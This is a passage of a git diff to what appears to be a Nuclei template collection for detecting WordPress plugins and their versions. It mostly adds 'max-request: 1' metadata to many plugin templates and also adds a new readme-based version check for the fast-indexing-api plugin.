https://wordpress.org/plugins/custom-post-type-ui/ metadata: + max-request: 1 plugin_namespace: custom-post-type-ui wpscan: https://wpscan.com/plugin/custom-post-type-ui tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index 5c5decc127..00d183f507 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/disable-comments/ metadata: + max-request: 1 plugin_namespace: disable-comments wpscan: https://wpscan.com/plugin/disable-comments tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index a8229a338e..451e1daef1 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/disable-gutenberg/ metadata: + max-request: 1 plugin_namespace: disable-gutenberg wpscan: https://wpscan.com/plugin/disable-gutenberg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 6559e64dce..af30ca76b6 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duplicate-page/ metadata: + max-request: 1 plugin_namespace: duplicate-page wpscan: https://wpscan.com/plugin/duplicate-page tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index a4368b8aa6..93823466d4 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duplicate-post/ metadata: + max-request: 1 plugin_namespace: duplicate-post wpscan: https://wpscan.com/plugin/duplicate-post tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index ec119e762a..e224283ecd 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duplicator/ metadata: + max-request: 1 plugin_namespace: duplicator wpscan: https://wpscan.com/plugin/duplicator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index b7ec7576a3..9af8df08a7 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duracelltomi-google-tag-manager/ metadata: + max-request: 1 plugin_namespace: duracelltomi-google-tag-manager wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml index c42d679973..d4081474c3 100644 --- a/http/technologies/wordpress/plugins/easy-fancybox.yaml +++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/easy-fancybox/ metadata: + max-request: 1 plugin_namespace: easy-fancybox wpscan: https://wpscan.com/plugin/easy-fancybox tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-google-fonts.yaml b/http/technologies/wordpress/plugins/easy-google-fonts.yaml index c9859e9770..96c813ad49 100644 --- a/http/technologies/wordpress/plugins/easy-google-fonts.yaml +++ b/http/technologies/wordpress/plugins/easy-google-fonts.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/easy-google-fonts/ metadata: + max-request: 1 plugin_namespace: easy-google-fonts wpscan: https://wpscan.com/plugin/easy-google-fonts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index fc44375947..bcbc0707fb 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/easy-table-of-contents/ metadata: + max-request: 1 plugin_namespace: easy-table-of-contents wpscan: https://wpscan.com/plugin/easy-table-of-contents tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index 58d5c881d0..8b23832297 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -7,9 +7,10 @@ info: reference: - https://wordpress.org/plugins/easy-wp-smtp/ metadata: + max-request: 1 plugin_namespace: easy-wp-smtp wpscan: https://wpscan.com/plugin/easy-wp-smtp - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-200 http: - method: GET diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 6cfb8bc272..f0c3e4bc63 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/elementor/ metadata: + max-request: 1 plugin_namespace: elementor wpscan: https://wpscan.com/plugin/elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 9caaa53263..eab4a0d725 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/elementskit-lite/ metadata: + max-request: 1 plugin_namespace: elementskit-lite wpscan: https://wpscan.com/plugin/elementskit-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 5e6b557952..74c172ac94 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/enable-media-replace/ metadata: + max-request: 1 plugin_namespace: enable-media-replace wpscan: https://wpscan.com/plugin/enable-media-replace tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index c5a665e6f7..f5a63a2ed2 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/envato-elements/ metadata: + max-request: 1 plugin_namespace: envato-elements wpscan: https://wpscan.com/plugin/envato-elements tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index a8b56b5df0..25ca7328ef 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/essential-addons-for-elementor-lite/ metadata: + max-request: 1 plugin_namespace: essential-addons-for-elementor-lite wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index 4e20e57107..cb1db5bee6 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ewww-image-optimizer/ metadata: + max-request: 1 plugin_namespace: ewww-image-optimizer wpscan: https://wpscan.com/plugin/ewww-image-optimizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 6f6a416595..a3207ea16a 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/facebook-for-woocommerce/ metadata: + max-request: 1 plugin_namespace: facebook-for-woocommerce wpscan: https://wpscan.com/plugin/facebook-for-woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml new file mode 100644 index 0000000000..2a4b772078 --- /dev/null +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -0,0 +1,50 @@ +id: wordpress-fast-indexing-api + +info: + name: Instant Indexing for Google Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/fast-indexing-api/ + metadata: + max-request: 1 + plugin_namespace: fast-indexing-api + wpscan: https://wpscan.com/plugin/fast-indexing-api + tags: tech,wordpress,wp-plugin,top-200 + +http: + - method: GET + + path: + - "{{BaseURL}}/wp-content/plugins/fast-indexing-api/readme.txt" + + payloads: + last_version: helpers/wordpress/plugins/fast-indexing-api.txt + + extractors: + - type: regex + part: body + internal: true + name: internal_detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index 11942f4fa4..366205085d 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/favicon-by-realfavicongenerator/ metadata: + max-request: 1 plugin_namespace: favicon-by-realfavicongenerator wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 87c2aeb4bd..598f08ce88 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/flamingo/ metadata: + max-request: 1 plugin_namespace: flamingo wpscan: https://wpscan.com/plugin/flamingo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 3696eefbf7..42cdfb4475 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/fluentform/ metadata: + max-request: 1 plugin_namespace: fluentform wpscan: https://wpscan.com/plugin/fluentform tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 8bab0a9c3e..a1af263dbd 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/font-awesome/ metadata: + max-request: 1 plugin_namespace: font-awesome wpscan: https://wpscan.com/plugin/font-awesome tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index affd270123..19265f910e 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/force-regenerate-thumbnails/ metadata: + max-request: 1 plugin_namespace: force-regenerate-thumbnails wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index 1e6a62e23b..c21d414695 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/formidable/ metadata: + max-request: 1 plugin_namespace: formidable wpscan: https://wpscan.com/plugin/formidable tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index 980265f531..91c89d0ad8 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/forminator/ metadata: + max-request: 1 plugin_namespace: forminator wpscan: https://wpscan.com/plugin/forminator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index daf205789d..539d9f7cec 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ga-google-analytics/ metadata: + max-request: 1 plugin_namespace: ga-google-analytics wpscan: https://wpscan.com/plugin/ga-google-analytics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 22bfa3ffe2..f4123bb594 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/gdpr-cookie-compliance/ metadata: + max-request: 1 plugin_namespace: gdpr-cookie-compliance wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 88d38e21ed..23a88ea130 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-analytics-dashboard-for-wp/ metadata: + max-request: 1 plugin_namespace: google-analytics-dashboard-for-wp wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index ad238445fc..8074ac337e 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-analytics-for-wordpress/ metadata: + max-request: 1 plugin_namespace: google-analytics-for-wordpress wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index 840c086fb9..575c9ebe67 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-listings-and-ads/ metadata: + max-request: 1 plugin_namespace: google-listings-and-ads wpscan: https://wpscan.com/plugin/google-listings-and-ads tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 2678f603c6..7b0f188ff7 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-site-kit/ metadata: + max-request: 1 plugin_namespace: google-site-kit wpscan: https://wpscan.com/plugin/google-site-kit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 20d947a5d1..898e4de56d 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-sitemap-generator/ metadata: + max-request: 1 plugin_namespace: google-sitemap-generator wpscan: https://wpscan.com/plugin/google-sitemap-generator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 22ee97b51f..4a76856a69 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/gtranslate/ metadata: + max-request: 1 plugin_namespace: gtranslate wpscan: https://wpscan.com/plugin/gtranslate tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 3f4c6c8936..b321ca63eb 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/gutenberg/ metadata: + max-request: 1 plugin_namespace: gutenberg wpscan: https://wpscan.com/plugin/gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index fa1bb64115..2b42c9f80c 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/happy-elementor-addons/ metadata: + max-request: 1 plugin_namespace: happy-elementor-addons wpscan: https://wpscan.com/plugin/happy-elementor-addons tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml b/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml index a8eca7b056..2409c6b370 100644 --- a/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml +++ b/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-and-footer-scripts/ metadata: + max-request: 1 plugin_namespace: header-and-footer-scripts wpscan: https://wpscan.com/plugin/header-and-footer-scripts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index da63d1cbf6..dbea07a6da 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-footer-code-manager/ metadata: + max-request: 1 plugin_namespace: header-footer-code-manager wpscan: https://wpscan.com/plugin/header-footer-code-manager tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index f94e7f6494..17a8f220cf 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-footer-elementor/ metadata: + max-request: 1 plugin_namespace: header-footer-elementor wpscan: https://wpscan.com/plugin/header-footer-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 95d2aa5f16..956a08b32d 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-footer/ metadata: + max-request: 1 plugin_namespace: header-footer wpscan: https://wpscan.com/plugin/header-footer tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index af8193b875..5a570b9077 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/health-check/ metadata: + max-request: 1 plugin_namespace: health-check wpscan: https://wpscan.com/plugin/health-check tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 8d7e45818b..4ecac0cd92 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/hello-dolly/ metadata: + max-request: 1 plugin_namespace: hello-dolly wpscan: https://wpscan.com/plugin/hello-dolly tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index ed3967db7b..e50f58cef8 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/host-webfonts-local/ metadata: + max-request: 1 plugin_namespace: host-webfonts-local wpscan: https://wpscan.com/plugin/host-webfonts-local tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 2ff5adba86..031bb48563 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/imagify/ metadata: + max-request: 1 plugin_namespace: imagify wpscan: https://wpscan.com/plugin/imagify tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 9099f3c0a5..3cdcf3da93 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/imsanity/ metadata: + max-request: 1 plugin_namespace: imsanity wpscan: https://wpscan.com/plugin/imsanity tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 1ee0e67542..c222bc9d4a 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/insert-headers-and-footers/ metadata: + max-request: 1 plugin_namespace: insert-headers-and-footers wpscan: https://wpscan.com/plugin/insert-headers-and-footers tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 43cb2ab09c..c8acf8c625 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/instagram-feed/ metadata: + max-request: 1 plugin_namespace: instagram-feed wpscan: https://wpscan.com/plugin/instagram-feed tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 7ba81036cf..66b7d6a363 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/intuitive-custom-post-order/ metadata: + max-request: 1 plugin_namespace: intuitive-custom-post-order wpscan: https://wpscan.com/plugin/intuitive-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml index 24fc3e3295..a36016562d 100644 --- a/http/technologies/wordpress/plugins/iwp-client.yaml +++ b/http/technologies/wordpress/plugins/iwp-client.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/iwp-client/ metadata: + max-request: 1 plugin_namespace: iwp-client wpscan: https://wpscan.com/plugin/iwp-client tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index e701e365ba..e4017b1a0a 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/jetpack/ metadata: + max-request: 1 plugin_namespace: jetpack wpscan: https://wpscan.com/plugin/jetpack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index c0cc5400a8..53d6d393bd 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/kadence-blocks/ metadata: + max-request: 1 plugin_namespace: kadence-blocks wpscan: https://wpscan.com/plugin/kadence-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 22687bcffe..c286e9a14f 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/kirki/ metadata: + max-request: 1 plugin_namespace: kirki wpscan: https://wpscan.com/plugin/kirki tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index b69d3d5bfe..364e3cd71e 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/leadin/ metadata: + max-request: 1 plugin_namespace: leadin wpscan: https://wpscan.com/plugin/leadin tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 7975a57702..4fcccbfc33 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts-reloaded/ metadata: + max-request: 1 plugin_namespace: limit-login-attempts-reloaded wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index ff4cef94d7..3fbc714d3b 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts/ metadata: + max-request: 1 plugin_namespace: limit-login-attempts wpscan: https://wpscan.com/plugin/limit-login-attempts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index a8903697b0..c49b506979 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/litespeed-cache/ metadata: + max-request: 1 plugin_namespace: litespeed-cache wpscan: https://wpscan.com/plugin/litespeed-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git 